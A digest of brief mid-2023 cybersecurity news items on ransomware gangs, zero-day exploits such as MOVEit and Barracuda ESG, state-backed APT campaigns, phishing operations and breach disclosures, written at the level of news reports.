    The hacking group UNC4841 has been connected to data theft incidents targeting Barracuda ESG appliances. These attacks exploited a zero-day vulnerability, CVE-2023-2868, which allowed remote command injection in Barracuda’s email attachment scanning module. The vendor became aware of the vulnerability on May 19th and promptly disclosed the exploitation. CISA issued an alert urging the U.S Federal agencies to apply the necessary security updates. Barracuda took the decision earlier this month to offer affected customers free device replacements instead of reimaging them with new firmware.

    Windows 11 KB5027231 Update Breaks Google Chrome For Malwarebytes Users

    As part of the June Patch Tuesday, Microsoft rolled out the Windows 11 22H2 KB5027231 update to fix several vulnerabilities. According to Malwarebytes, the patch is blocking Chrome from loading on updated systems running the vendor’s anti-exploit module. “On June 13, 2023, Microsoft's KB5027231 update installed on Windows 11 caused a conflict between Google Chrome and exploit protection, resulting in browser crashes, stated Malwarebytes in an advisory.

    GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files

    An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. ‘Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files,’ ESET researcher Lukáš Štefanko said in a new report published today.

    LockBit Ransomware Extorted $91 Million in 1,700 U.S. Attacks

    In a joint advisory, U.S. and international cybersecurity authorities have revealed that the LockBit ransomware gang has extorted approximately $91 million from U.S. organizations through around 1,700 attacks since 2020. LockBit, a Ransomware-as-a-Service (RaaS) operation, emerged as the leading global ransomware threat in 2022, with the highest number of victims reported on their data leak site.

    Russian Hackers Use PowerShell USB Malware to Drop Backdoors

    The Russian state-sponsored hacking group Gamaredon (aka Armageddon or Shuckworm) continues to target critical organizations in Ukraine's military and security intelligence sectors, employing a refreshed toolset and new infection tactics. Previously, the Russian hackers, who have been linked to the FSB, were observed using information-stealers against Ukrainian state organizations, employing new variants of their "Pteranodon" malware, and also using a default Word template hijacker for new infections. Symantec's threat research team, part of Broadcom, reports today that the threat actors have recently begun using USB malware to propagate to additional systems inside infected networks.

    Unveiling the Balada Injector: A Malware Epidemic in WordPress

    In April 2023, credible sources such as Bleeping Computer and TechRadar began disseminating alarming accounts of cybercriminals who ingeniously breached WordPress websites. Exploiting the vulnerabilities of the widely-admired plugins, Elementor Pro Premium (webpage builder) and WooCommerce (online storefront), these malicious actors gained unauthorized access with devastating consequences.

    Microsoft June 2023 Patch Tuesday fixes 78 flaws, 38 RCE bugs

    As part of the June Patch Tuesday, Microsoft addressed 78 flaws which include 17 Elevation of Privilege Vulnerabilities, 3 Security Feature Bypass Vulnerabilities, 32 Remote Code Execution Vulnerabilities, 5 Information Disclosure Vulnerabilities, 10 Denial of Service Vulnerabilities, 10 Spoofing Vulnerabilities, and 1 Edge - Chromium Vulnerability. Out of the 78 flaws fixed, 6 have been rated critical in severity, 63 rated Important, 2 rated moderate, and 1 rated low in severity.

    Fake Zero-Day PoC Exploits on GitHub Push Windows, Linux malware

    Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware. These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research. The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7, and other security firms, even using their headshots.

    Gozi Host 'Virus' Sentenced to 3 Years in US Prison

    Mihai Ionut Paunescu, a 39-year-old Romanian national, has been sentenced to 36 months in a U.S. federal prison for his role in hosting the digital infrastructure used for banking Trojans that led to the theft of tens of millions of dollars. He pleaded guilty to conspiring to commit computer intrusion with the intent to defraud. Paunescu, also known as "Virus," played a critical role in providing the necessary IT infrastructure, which involved renting IP addresses and relocating customer data to different networks and IP addresses to avoid detection by law enforcement.

    Researchers Uncover XSS Vulnerabilities in Azure Services

    Cybersecurity experts at Orca Security have identified two critical cross-site scripting (XSS) vulnerabilities in Microsoft Azure services. The vulnerabilities are related to an identified weakness in the postMessage iframe. Abusing this flaw could expose Azure users to potential security breaches. These vulnerabilities were found in both Azure Bastion and the Azure Container Registry, which are two commonly used services in the Azure ecosystem.

    UK Communications Regulator Ofcom Hacked With a Moveit File Transfer Zero-Day

    The UK’s communication regulator, Ofcom, revealed a data breach caused by a Clop ransomware attack. Exploiting a zero-day vulnerability in the MOveit file transfer system, the attackers successfully infiltrated Ofcom’s infrastructure. A representative from Ofcom stated “A limited amount of information about certain companies we regulate – some of it confidential – along with personal data of 412 Ofcom employees, was downloaded during the attack,” the spokesperson told The Record.

    Massive Phishing Campaign Uses 6,000 Sites to Impersonate 100 Brands

    A widespread brand impersonation campaign targeting over a hundred popular apparel, footwear, and clothing brands has been underway since June 2022, tricking people into entering their account credentials and financial information on fake websites. The brands impersonated by the phony sites include Nike, Puma, Asics, Vans, Adidas, Columbia, Superdry Converse, Casio, Timberland, Salomon, Crocs, Sketchers, The North Face, UGG, Guess, Caterpillar, New Balance, Fila, Doc Martens, Reebok, Tommy Hilfiger, and others. According to Bolster's threat research team, who discovered the campaign, it relies on at least 3,000 domains and roughly 6,000 sites, including inactive ones.

    Microsoft: Azure Portal Outage Was Caused by Traffic "Spike”

    Microsoft revealed in an update to the Azure status page that the preliminary root cause behind an outage that impacted the Azure Portal worldwide on Friday was what it described as a traffic "spike." Customers who wanted to access the Azure Portal on Friday afternoon at portal.azure[.]com reported issues connecting and seeing a warning saying,

    RDP Honeypot Targeted 3.5 Million Times in Brute-force Attacks

    Researchers using a Remote Desktop Protocol honeypot found that exposed connections are so attractive to attackers that they were targeted around 37,000 times a day from various IP addresses. The attacks are completely automated, but once the right access credentials were found via brute-forcing, hackers will manually begin looking for important or sensitive files.

    Microsoft Warns of Multi-Stage AiTM Phishing and BEC Attacks

    Microsoft researchers have issued a warning about a new form of cyber attack known as "adversary-in-the-middle" (AiTM) phishing and business email compromise (BEC), specifically targeting banking and financial institutions. These attacks involve threat actors creating a proxy server that sits between a user and their desired website. The proxy server, controlled by the attackers, intercepts and captures the user's password and session cookie, allowing the attackers to gain unauthorized access to sensitive information.

    Ukrainian Hackers Take Down Service Provider for Russian Banks

    A group of Ukrainian hackers known as the Cyber.Anarchy.Squad claimed an attack that took down Russian telecom provider Infotel JSC on Thursday evening. Among other things, Moscow-based Infotel provides connectivity services between the Russian Central Bank and other Russian banks, online stores, and credit institutions.

    Xplain Data Breach Also Impacted the National Swiss Railway FSS

    The Play ransomware attack suffered by the IT services provider Xplain has proven to be worse than initially estimated. The incident has also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. In early June, Swiss police initiated an investigation into the cyber attack that targeted Xplain, a Bernese IT company providing services to various federal and cantonal government departments, the army, customs, and the Federal Office of Police (Fedpol).

    Nova Scotia Health Says 100,000 Affected by MOVEit Hack

    The personal information of approximately 100,000 Nova Scotia Health employees was unlawfully obtained by hackers who exploited a zero-day vulnerability in Progress Software's MOVEit managed file transfer application. The recent disclosure made by the women's and children's health center is a sign that other healthcare organizations may also announce data breaches caused by ransomware hackers who exploited a previously fixed vulnerability in the software.

    Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks

    Researchers at SentinelOne have uncovered a new Kimsuky-backed social-engineering campaign targeting experts in North Korean affairs to steal Google and subscription credentials for NK news, an American-based news website that provides analysis and news focusing on North Korea. In the latest campaign, the group was observed sending emails impersonating Chad O’Carroll, the founder of NK News. The emails request victims to review a draft article analyzing the nuclear threat posed by North Korea. If the victim replies to the email, a follow up email is sent by Kimsuky which contains a spoofed URL to a Google document, designed to redirect the target to a malicious website crafted to capture Google credentials.

    Researchers Published PoC Exploit Code for Actively Exploited Windows Elevation of Privilege Issue

    The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k component. Win32k.sys is a system driver file in the Windows operating system. The driver is responsible for providing the interface between user-mode applications and the Windows graphical subsystem. The vulnerability is actively exploited in attacks. The issue can be chained with a code execution bug to spread malware. The vulnerability was reported by researchers Jan Vojtěšek, Milánek, and Luigino Camastra from Avast Antivirus firm. The researchers believe this flaw was used as part of an exploit chain to deliver malware.

    Clop Ransomware Likely Testing MOVEit Zero-day Since 2021

    he Clop ransomware gang has been looking for ways to exploit a now-patched zero-day in the MOVEit Transfer managed file transfer (MFT) solution since 2021, according to Kroll security experts. While analyzing logs on some clients' compromised networks during the investigation of recent Clop data theft attacks targeting vulnerable MOVEit Transfer instances, they found malicious activity matching the method used by the gang to deploy the newly discovered LemurLoot web shell.

    Hacking Group Seen Mixing Cybercrime and Cyberespionage

    Researchers suggest that a hacking collective, believed to have connections to the Belarusian government, is engaging in a fusion of illicit cyber activities involving both criminal endeavors and espionage in the digital realm. There is evidence to suggest that a hacking organization linked to the Belarusian government is blending cybercrime activities with cyberespionage. Referred to as Asylum Ambuscade, this group has been identified as "a cybercrime group that engages in some cyberespionage activities on the side" since 2020, as stated in a recent report by cybersecurity firm ESET, authored by malware researcher Matthieu Faou.

    Royal Ransomware Gang Adds BlackSuit Encryptor to Their Arsenal

    The Royal ransomware gang has begun testing a new encryptor called BlackSuit that shares many similarities with the operation's usual encryptor. Since late April, there have been rumbles that the Royal ransomware operation was getting ready to rebrand under a new name. This escalated further after they began to feel pressure from law enforcement after they attacked the City of Dallas, Texas. A new BlackSuit ransomware operation was discovered in May that used its own branded encryptor and Tor negotiation sites.

    Cisco Fixes AnyConnect Bug Giving Windows SYSTEM Privileges

    Cisco recently addressed a high-severity flaw in its Cisco Secure Client software that could allow threat actors to escalate privileges to the SYSTEM account used by the operating system. “Cisco Secure Client enables employees to work from anywhere via a secure Virtual Private Network (VPN) and provides admins with endpoint management and telemetry features.

    Barracuda Says Hacked ESG Appliances Must be Replaced Immediately

    Email and network security company Barracuda warns customers they must replace Email Security Gateway (ESG) appliances hacked in attacks targeting a now-patched zero-day vulnerability. "Impacted ESG appliances must be immediately replaced regardless of patch version level," the company warned in a Tuesday update to the initial advisory. "Barracuda's remediation recommendation at this time is full replacement of the impacted ESG.

    Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

    A cybercriminal affiliated with the Magecart group has successfully infected an undisclosed number of e-commerce websites across the United States, United Kingdom, and five other countries with malware designed to skim credit card numbers and personally identifiable information (PII) from unsuspecting individuals who engage in online purchases on these platforms. However, a novel twist in this malicious campaign involves the exploitation of the same compromised websites as hosts for distributing the card-skimming malware to other targeted sites.

    Outlook Hit By Outages as Hacktivists Claim DDoS Attacks

    Outlook.com is suffering a series of outages today after being down multiple times yesterday, with hacktivists known as Anonymous Sudan claiming to perform DDoS attacks on the service. This outage follows two major outages yesterday, creating widespread disruptions for global Outlook users, preventing users worldwide from reliably accessing or sending email and using the mobile Outlook app.

    NASA Website Flaw Jeopardizes Astrobiology Fans

    The open redirect vulnerability plaguing NASA's Astrobiology website was independently discovered by the Cybernews research team. Upon finding the flaw, it was revealed that a researcher from an open bug bounty program had already identified it a few months earlier on January 14th, 2023. However, the agency failed to address and fix the vulnerability, exposing global users to risks until May 2023. Attackers could have exploited the flaw to redirect unsuspecting users to malicious websites, luring them into providing sensitive data such as login credentials and credit card numbers.

    New ChatGPT Attack Technique Spreads Malicious Packages

    A new cyber-attack technique using the OpenAI language model ChatGPT has emerged, allowing attackers to spread malicious packages in developers' environments. Vulcan Cyber's Voyager18 research team described the discovery in an advisory published today. "We've seen ChatGPT generate URLs, references and even code libraries and functions that do not actually exist. These large language model (LLM) hallucinations have been reported before and may be the result of old training data," explains the technical write-up by researcher Bar Lanyado and contributors Ortal Keizman and Yair Divinsky.

    New ‘Powerdrop’ Powershell Malware Targets U.S. Aerospace Industry

    A new PowerShell malware called "PowerDrop" specifically targets the U.S. aerospace defense industry. The cybersecurity firm Adlumin, found a sample of this malware in the network of a defense contractor in the U.S. PowerDrop utilizes PowerShell and Windows Management Instrumentation (WMI) to establish a persistent remote access trojan (RAT) within the compromised networks. The tactics employed by the malware fall somewhere between "off-the-shelf" malware and sophisticated advanced persistent threat (APT) techniques. Based on the timing and targets of the attacks, it is highly probable that the perpetrator behind the malware is a state-sponsored entity.

    Cyclops Ransomware Gang Offers Go-Based Info Stealer to Cybercriminals

    Threat actors associated with the Cyclops ransomware have been observed offering an information stealer malware that's designed to capture sensitive data from infected hosts. ‘The threat actor behind this [ransomware-as-a-service] promotes its offering on forums," Uptycs said in a new report.' ‘There it requests a share of profits from those engaging in malicious activities using its malware.’ The Go-based stealer, for its part, is designed to target Windows and Linux systems, capturing details such as operating system information, computer name, number of processes, and files of interest matching specific extensions.

    Google Fixes New Chrome Zero-Day Flaw With Exploit in the Wild

    Yesterday, Google released security updates to address a zero-day flaw in its Chrome web browser. Tracked as CVE-2023-3079, the bug has been assessed as a high-severity issue and is related to a type confusion bug in the Chrome V8 JavaScript engine. “Type confusion bugs arise when the engine misinterprets the type of an object during runtime, potentially leading to malicious memory manipulation and arbitrary code execution.

    Iowa Reports Third Big Vendor Breach This Year

    The state government of Iowa has recently reported its third major health data breach since April, all involving third-party vendors. The most recent breach occurred at dental health insurer MCNA Insurance Co., with the Iowa Department of Health and Human Services disclosing that hackers compromised the protected health information of nearly 234,000 Iowa residents.

    Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors

    VMware’s Carbon Black Managed Detection and Response (MDR) team saw a surge in TrueBot activity in May 2023. TrueBot is a botnet that has been active since 2017 and is linked to the Silence group, a cybercriminal group that is known for targeting banks and financial institutions, in addition to the educator sector. According to VMware’s MDR team, TrueBot has been under active development by Silence, with the latest versions now leveraging a Netwrix vulnerability (CVE-2022-31199, CVSS score: 9.8) as a delivery vector.

    Microsoft Links Clop Ransomware Gang to MOVEit Data-Theft Attacks

    On Sunday night, Microsoft's Threat Intelligence team tweeted that they have linked the recent attacks that exploit a zero-day vulnerability in the MOVEit Transfer platform to the Clop ransomware gang, which is also known as Lace Tempest. This particular gang has gained a reputation for conducting ransomware operations and managing the Clop extortion site. BleepingComputer was the first to report last Thursday that threat actors have been exploiting a previously unknown vulnerability in MOVEit Transfer servers to illicitly obtain data from targeted organizations.

    Zyxel Shares Tips on Protecting Firewalls From Ongoing Attacks.

    Zyxel has published a security advisory containing guidance on protecting firewall and VPN devices from ongoing attacks and detecting signs of exploitation. This warning comes in response to multiple reports of widespread exploitation of the CVE-2023-28771 and the exploitability and severity of CVE-2023-33009 and CVE-2023-33010, all impacting Zyxel VPN and firewall devices.

    New Linux Ransomware BlackSuit is Similar to Royal Ransomware

    Royal ransomware is one of the most notable ransomware families of 2022, it made the headlines in early May 2023 with the attack against the IT systems in Dallas, Texas. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars.

    Toyota Admits to Yet Another Cloud Leak

    Toyota, the automobile manufacturer, apologized for leaking customer records online due to a misconfigured cloud environment. This is the second time Toyota has apologized for a cloud leak in recent weeks. The company said the leak was caused by "insufficient dissemination and enforcement of data handling rules." Toyota said there is no evidence that the data has been misused.

    Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering

    The Chinese nation-stage group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of ‘basic machine enumeration and command execution via PowerShell or Goroutines.’ What the malware lacks in terms of sophistication, it makes up for it when it comes to establishing redundant methods to retain access to the compromised host by means of multiple persistency tasks and varied methods to communicate with different servers.

    Malicious Chrome Extensions With 75M Installs Removed From Web Store

    Google has removed from the Chrome Web Store 32 malicious extensions that could alter search results and push spam or unwanted ads. Collectively, they come with a download count of 75 million. The extensions featured legitimate functionality to keep users unaware of the malicious behavior that came in obfuscated code to deliver the payloads. Cybersecurity researcher Wladimir Palant analyzed the PDF Toolbox extension (2 million downloads) available from Chrome Web Store and found that it included code that was disguised as a legitimate extension API wrapper.

    New Horabot Campaign Takes Over Victim’s Gmail, Outlook Accounts

    A previously unknown campaign involving the Hotabot botnet malware has targeted Spanish-speaking users in Latin America since at least November 2020, infecting them with a banking trojan and spam tool. The malware enables the operators to take control of the victim's Gmail, Outlook, Hotmail, or Yahoo email accounts, steal email data and 2FA codes arriving in the inbox, and send phishing emails from the compromised accounts. The new Horabot operation was discovered by analysts at Cisco Talos, who report that the threat actor behind it is likely based in Brazil. The multi-stage infection chain begins with a tax-themed phishing email sent to the target, with an HTML attachment that is supposedly a payment receipt. Opening the HTML launches a URL redirection chain that lands the victim on an HTML page hosted on an attacker-controlled AWS instance.

    Top 3 API Security Risks and How to Mitigate Them

    The application programming interface (API) is an unsung hero of the digital revolution. It provides the glue that sticks together diverse software components in order to create new user experiences. But in providing a direct path to back-end databases, APIs are also an attractive target for threat actors. It doesn’t help that they have exploded in number over recent years, leading many deployments to go undocumented and unsecured. According to one recent study, 94% of global organizations have experienced API security problems in production over the past year with nearly a fifth (17%) suffering an API-related breach. It’s time to gain visibility and control of these digital building blocks.

    New MOVEit Transfer Zero-Day Mass-Exploited in Data Theft Attacks

    Cybercriminals are taking advantage of a zero-day vulnerability in the MOVEit Transfer software. This vulnerability allows them to illicitly obtain data from targeted organizations. MOVEit Transfer is a managed file transfer (MFT) software designed by Ipswitch, a subsidiary of Progress Software Corporation based in the United States. It facilitates secure file transfers between enterprises, business partners, and customers using protocols like SFTP, SCP, and HTTP-based uploads.

    SpinOk Trojan Compromises 421 Million Android Devices

    Security researchers have recently detected a novel Android Trojan that has the potential to compromise a staggering 421 million devices. In a recently released advisory on Monday, the Doctor Web team revealed details about this Trojan, referred to as Android[.]Spy.SpinOk. Android[.]Spy.SpinOk possesses numerous spyware capabilities, such as gathering files and capturing clipboard content. This Trojan spreads by being concealed within other applications, thereby infecting a vast number of devices.

    Experts Warn of Backdoor-like Behavior Within Gigabyte Systems

    This should be treated as Critical if you are a user of Gigabyte systems. We may upgrade this to High severity should reports of active exploitation occur.

    Researchers from firmware security firm Eclypsium have discovered a suspected backdoor-like behavior within Gigabyte systems. The experts discovered that the firmware in Gigabyte systems drops and executes a Windows native executable during the system startup process. The executable is utilized for insecure downloading and execution of additional payloads. The experts pointed out that this is the same behavior observed for other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) and firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK,.

    Hackers Exploit Critical Zyxel Firewall Flaw in Ongoing Attacks

    A critical command injection flaw in Zyxel networking devices is being exploited by hackers in widespread attackers to install malware. Tracked as CVE-2023-28771, the flaw resides in the default configuration of impacted firewall and VPN devices and can be abused to perform unauthenticated remote code execution via a specially crafted IKEv2 packet to UDP port 500 on the impacted device.

    Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

    The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a ‘number of updated capabilities that strengthen the group's efforts to evade detection,’ IBM Security X-Force said in a new analysis. The ‘product’ update was first highlighted by vx-underground in April 2023. Trend Micro, last month, detailed a Linux version of Sphynx that's ‘focused primarily on its encryption routine.

    Dark Pink Hackers Continue to Target Govt and Military Organizations

    In 2023, the Dark Pink APT hacking group remains highly active, focusing its attacks on government, military, and education organizations in Indonesia, Brunei, and Vietnam. This threat group has been operational since around mid-2021, primarily concentrating its efforts on targets in the Asia-Pacific region. However, it was only in January 2023 that the group gained public attention following a report by Group-IB. According to the researchers, a thorough analysis of the group's past activities has revealed further instances of breaches.

    Microsoft Details Critical Apple macOS Vulnerability Allowing SIP Protection Bypass

    Researchers at Microsoft, Jonathan Bar Or, Michael Pearse, and Anurag Bohra, recently disclosed details of a now-patched flaw in Apple macOS that could be exploited by threat actors with root access to bypass security enforcements and perform arbitrary actions on unpatched devices. Tracked as CVE-2023-32369 (aka ‘Migraine’), the flaw could permit actors to bypass a security feature dubbed System Integrity Protection (SIP) which is designed to limit the actions a root user can perform on protected files and folders. By abusing this flaw, “an attacker can create files that are protected by SIP and therefore undeletable by ordinary means.

    Human Error Fuels Industrial APT Attacks, Kaspersky Reports

    Cybersecurity firm Kaspersky has identified the primary factors contributing to advanced persistent threat (APT) attacks in industrial sectors. The first of them, discussed in a new report published today, is the absence of isolation in operational technology (OT) networks” (Info Security Magazine, 2023). Kaspersky observed engineering workstations being connected to both the IT and OT networks. Previously air-gapped OT/ICS environments are being more commonly connected to the Internet.

    Gouda Hacker: Charges Tie to Ransomware Hit Affecting Cheese

    Mikhail Matveev, 31, the Russian national whom prosecutors accused of wielding not one but three strains of ransomware. Two federal indictments unsealed this month accuse Matveev - aka Wazawaka, m1x, Boriselcin, Uhodiransomwar - of operating as an affiliate for the LockBit, Babuk and Hive ransomware groups. Security experts say the indictments are notable because they don't target ransomware-as-a-service group chiefs but rather a foot soldier who was directly responsible for hacking into victims' networks and using the ransomware to extort them.

    Beware of the New Phishing Technique “File Archiver in the Browser” That Exploits Zip Domains

    Phishers have devised a novel phishing technique known as "file archiver in the browser" that capitalizes on victims visiting a .ZIP domain. This method involves emulating a file archiver software within a web browser, as revealed by security researcher mr.d0x. Recently, Google introduced eight additional top-level domains (TLDs), including .zip and .mov. However, cybersecurity professionals are cautioning about potential malicious activities associated with these domains.

    New Hacking Forum Leaks Data of 478,000 RaidForums Members

    A database for the notorious RaidForums hacking forums has been leaked online, allowing threat actors and security researchers insight into the people who frequented the forum. RaidForums was a very popular and notorious hacking and data leak forum known for hosting, leaking, and selling data stolen from breached organizations. Threat actors who frequented the forum would hack into websites or access exposed database servers to steal customer information.

    Invoice and CEO Scams Dominate Fraud Impacting Businesses

    Losses to fraud reported by the organization's more than 300 member firms, which provide credit, banking, markets and payment services in the U.K., declined 8% from 2021, although still involved 3 million cases of fraud. "These numbers are big but slightly down on where we were in 2021, both in terms of the number of cases and the value of losses," said Lee Hopley, director of economic insight and research at UK Finance. The industry reported preventing about $1.5 billion worth of fraud in 2022, although she said the actual amount is likely higher, given the challenges of measuring fraud prevention.

    Lazarus Hackers Target Windows IIS Web Servers for Initial Access

    The notorious North Korean state-backed hackers, known as the Lazarus Group, are now targeting vulnerable Windows Internet Information Services (IIS) web servers to gain initial access to corporate networks. Lazarus is primarily financially motivated, with many analysts believing that the hackers' malicious activities help fund North Korea's weapons development programs. However, the group has also been involved in several espionage operations. The latest tactic of targeting Windows IIS servers was discovered by South Korean researchers at the AhnLab Security Emergency Response Center (ASEC).

    New OT Malware Possibly Related To Russian Emergency Response Exercises

    COSMICENERGY’s capabilities and overall attack strategy appear reminiscent of the 2016 INDUSTROYER incident, which issued IEC-104 ON/OFF commands to interact with RTUs and, according to one analysis, may have made use of an MSSQL server as a conduit system to access OT. Leveraging this access, an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption. COSMICENERGY accomplishes this via its two derivative components, which we track as PIEHOP and LIGHTWORK. PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user-supplied remote MSSQL server for uploading files and issuing remote commands to a RTU. PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands "ON" or "OFF" to the remote system and then immediately deletes the executable after issuing the command.

    BlackByte Ransomware Claims City of Augusta Cyberattack

    The City of Augusta in Georgia, USA, has verified that the recent disruption to its IT system was a result of unauthorized intrusion into its network. While the administration has not revealed specific details about the nature of the cyberattack, the BlackByte ransomware group has publicly acknowledged the city of Augusta as one of its targeted victims.

    Microsoft 365 Phishing Attacks Use Encrypted RPMSG Messages

    Attackers are now using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts to steal Microsoft credentials in targeted phishing attacks designed to evade detection by email security gateways. RPMSG files (also known as restricted permission message files) are encrypted email message attachments created using Microsoft's Rights Management Services (RMS) and offer an extra layer of protection to sensitive info by restricting access to authorized recipients. To access and read the encrypted contents of RPMSG attachments, recipients are required to either authenticate using their Microsoft account or acquire a one-time passcode for decryption.

    New Buhti Ransomware Uses Leaked Payloads and Public Exploits

    A relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems. While the group doesn’t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types. Buhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec’s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.

    ‘Operation Magalenha’ Targets Credentials of 30 Portuguese Banks

    A report from Sentinel Labs has revealed the details of this campaign, shedding light on the tools utilized by the threat actor, the different methods of infection employed, and the techniques employed to distribute their malware. The analyst obtained information regarding the origin and tactics of the threat actor through the discovery of a server misconfiguration that inadvertently exposed files, directories, internal correspondence, and other sensitive data.

    North Korea-Linked Lazarus APT Targets Microsoft IIS Servers to Deploy Malware

    Researchers at AnhLab Security Emergency Response Center (ASEC) have revealed that the Lazarus APT Group, a cybercriminal organization associated with North Korea, has been focusing its attention on exploiting vulnerable Microsoft IIS servers. Through the use of DLL side-loading, the attackers deploy a malicious Dll file named msvcr100[.]dll, which is strategically placed in the same directory as a legitimate application called Wordconv[.]exe. By exploiting the Windows ISS web server process the malicious library is executed to carry out their nefarious activities.

    Chinese Hackers Breach US Critical Infrastructure in Stealthy Attacks:

    This advisory highlights the recent state-sponsored cyber activity by the People's Republic of China (PRC) and provides crucial information for network defenders to identify and mitigate this activity. The advisory focuses on network and host artifacts, particularly command lines used by the cyber actor, and includes indicators of compromise (IOCs) for reference. However, defenders should exercise caution and evaluate matches to determine their significance, considering the possibility of false positive indicators resulting from benign activity.

    New PowerExchange Malware Backdoors Microsoft Exchange Servers

    FortiEDR research lab has identified a targeted attack against a government entity in the United Arab Emirates, involving a custom PowerShell-based backdoor called PowerExchange. The backdoor utilizes the victim's Microsoft Exchange server as its command and control (C2) server, operating through an email-based C2 protocol. The investigation revealed multiple implants and a unique web shell named ExchangeLeech, capable of credential harvesting. The indicators point to an Iranian threat actor as the perpetrator of these attacks. The attack chain starts with email phishing and the execution of a malicious .NET executable. The backdoor establishes communication with the Exchange server, sends and receives commands through mailboxes, and executes malicious payloads.

    North Korean APT Group Kimsuky Shifting Attack Tactics

    North Korean hackers belonging to the Kimsuky group are employing custom-built malware to carry out information exfiltration campaigns against organizations supporting human rights activists and North Korean defectors. The cybersecurity firm SentinelOne discovered a new variant of the RandomQuery malware, which is commonly used by the Pyongyang threat actor. Kimsuky specializes in targeting think tanks and journalists. The distribution of the malware is facilitated through compiled HTML files, a tactic frequently utilized by North Korean hackers. The objective of this particular campaign is file enumeration and information exfiltration, “The variation of RandomQuery in this campaign has the "single objective of file enumeration and information exfiltration," in contrast to recently observed North Korean use of the malware to support a wider array of functions such as keylogging and the execution of additional malware.

    GoldenJackal State Hackers Silently Attacking Govts Since 2019

    Kaspersky recently disclosed the activities of a lesser-known advanced persistent threat group called GoldenJackal. This group has been engaged in espionage against government and diplomatic organizations in Asia since 2019. To maintain a cover presence, the threat actors have been cautious in their operations. They carefully choose their targets and limit the frequency of their attacks, aiming to minimize the risk of detection. Kaspersky, which has been monitoring GoldenJackal since 2020, has revealed that the group is active in Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey.

    SuperMailer Abuse Bypasses Email Security for Super-Sized Credential Theft

    A large-scale operation focused on harvesting credentials has emerged, utilizing a legitimate email newsletter program called SuperMailer to distribute a substantial volume of phishing emails. The intention behind this campaign is to bypass secure email gateway protections. Recent findings from Cofense, as of May 23, reveal that SuperMailer-generated emails account for a significant portion of all credential phishing attempts, constituting approximately 5% of the firm's telemetry for May.

    IT Employee Piggybacked on Cyberattack for Personal Gain

    A former IT employee of an Oxford-based company has been convicted of blackmailing his employer and unauthorized access to a computer for personal gain. After a cyber security incident at the company, the employee took advantage of the breach by accessing a board member's private emails, altering the original blackmail email, and changing the payment address.

    State-Aligned Actors Targeting SMBs Globally

    Proofpoint researchers have discovered that advanced persistent threat (APT) actors are increasingly targeting small and medium-sized businesses (SMBs), governments, militaries, and major corporations through compromised SMB infrastructure in phishing campaigns. These threat actors are also launching financially motivated attacks against SMB financial services firms and carrying out supply chain attacks affecting SMBs. Proofpoint emphasizes the tangible risk that APT actors pose to SMBs today through the compromise of their infrastructure.

    Barracuda Warns of Email Gateways Breached via Zero-Day Flaw

    Barracuda, a company specializing in email and network security solutions, informed its customers that some of their Email Security Gateway (ESG) appliances were breached due to a recently patched zero-day vulnerability. The vulnerability was discovered on May 19 and was promptly addressed with security patches on May 20 and 21. Barracuda confirmed unauthorized access to a subset of ESG appliances but assured customers that its other products were unaffected. Impacted organizations were notified, and Barracuda advised them to review their environments for any potential spread of the threat actors to other devices on the network. Details regarding the number of affected customers and potential data impact were not provided.

    A Deeper Insight Into the Cloudwizard APT’s Activity Revealed a Long-Running Activity

    Researchers warn of a threat actor known as CloudWizard APT, which is actively targeting organizations operating in the Russo-Ukraine conflict region. In March 2023, Kaspersky reearchers dicovered the new APT group, referred to as Bad Magic or Red Stinger, engaging in cyber attacks against entities in the same area. The attackers utilized PowerMagic and CommonMagic implants in their operations. During their investigation, the researchers discovered another set of highly advanced malicious activities linked to the same threat actor, demonstrating even greater sophistication.

    Food Distributor Sysco Says Cyberattack Exposed 126,000 Individuals

    A multinational company headquartered in Houston, Texas, Sysco is one of the largest distributors of food products, kitchen equipment, smallware, and tabletop products to restaurants, lodging establishments, healthcare and education organizations, and other entities” (Security Week, 2023). The company initially disclosed the incident in early May, in a Form 10-Q filing with the US Securities and Exchange Commission (SEC), when it revealed that the data breach was identified on March 5, 2023, but said that the attackers likely had unauthorized access to its systems starting January 14, 2023.

    Batloader Campaign Impersonates ChatGPT and Midjourney to Deliver Redline Stealer

